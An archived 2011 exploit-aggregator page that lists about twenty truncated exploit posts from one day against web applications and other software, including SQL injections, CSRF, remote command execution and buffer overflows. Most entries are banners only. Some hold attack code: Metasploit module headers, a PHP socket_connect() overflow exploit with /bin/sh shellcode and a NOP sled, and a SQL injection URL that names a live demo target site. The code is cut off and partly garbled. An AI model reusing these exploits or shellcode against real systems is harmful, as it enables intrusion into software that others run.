Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for May 28th, 2011

[webapps / 0day] – Profshop (cms_display.php)<= Blind SQL Injection Vulnerability

May.28, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – Web File Browser 0.4b14 => File[Shell]upload / Information Disclosure

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[remote exploits] – 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow

May.28, 2011 in Exploits

##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]

Leave a Comment

[webapps / 0day] – Whitetail Quest <= SQL Injection Vulnerability

May.28, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – XMS Systems <= SQL Injection Vulnerability

May.28, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – Wordpress Plugin Is-human <=1.4.2 Remote Command Execution

May.28, 2011 in Exploits

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run out own code.
In [...]

Leave a Comment

[webapps / 0day] – InHouse CMS <= SQL Injection Vulnerability

May.28, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Trade Line Web <= Remote (id) Funcs SQL-i Vulnerabilities

May.28, 2011 in Exploits

Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Zen Cart <= v1.3.9h Multiple Vulnerabilities

May.28, 2011 in Exploits

[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]

Leave a Comment

[webapps / 0day] – vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – werkform (index.php) <= SQL Injection Vulnerability

May.28, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – xtcModified <= 1.05 (FCKeditor) Multiple Vulnerabilities

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Homepages Admin (index.php) => Auth Bypass Vulnerability

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Ciphertek Systems (snapshots/detail) => SQL Injection Vulnerability

May.28, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[local exploits] – PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

May.28, 2011 in Exploits

<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]

Leave a Comment

[webapps / 0day] – AWStats Totals =< v1.14 multisort Remote Command Execution

May.28, 2011 in Exploits

##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]

Leave a Comment

[webapps / 0day] – cPanel < 11.25 CSRF – Add User php Script

May.28, 2011 in Exploits

# Exploit Title: cPanel < 11.25 CSRF – Add php script
# Date: 27.05.2011
# Author: ninjashell
# Software Link: http://cpanel.net
# Version: 11.25 (see details below)
# Tested on: Linux
# CVE : N/A
I. Introduction
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which
leads to uploading a PHP script of the attackers liking. If you have turned
off security [...]

Leave a Comment

[dos / poc] – Poison Ivy 2.3.2 Remote Buffer Overflow

May.28, 2011 in Exploits

# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <kevin.nullbyte@gmail.com>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.
/* Poison Ivy 2.3.2 Remote Buffer Overflow
* Author: Kevin R.V <kevin.nullbyte@gmail.com>
* Date: 2011
* [...]

Leave a Comment

[webapps / 0day] – Duhok Forum 1.1 SQL Injection Vulnerability

May.28, 2011 in Exploits

# Exploit Title: DuhokForum <= 1.1 (index.php) SQL Injection Vulnerability
# Date: 28-05-2011
# Author: M.Jock3R
# Vendor or Software Link: http://www.duhoktimes.com/df/?file=duhokforum-1.1
# Version: 1.1
# Category:: webapps
# Google dork: duhokFrm 1.1 © Dilovan 2007 – 2008
# Tested on: windows XP Sp2 FR
# Demo site: http://forum2009.eb2a.com/index.php?mode=f&f=1′
Exploit:
http:localhost/duhokfrm/index.php?modd=[Inj3ct Here ]
===================================================================
Greets To :
Adelsbm / attiadona / Wjforum
mail : madrido.jocker@gmail.com
THANKS TO ALL ALGERIAN [...]

Leave a Comment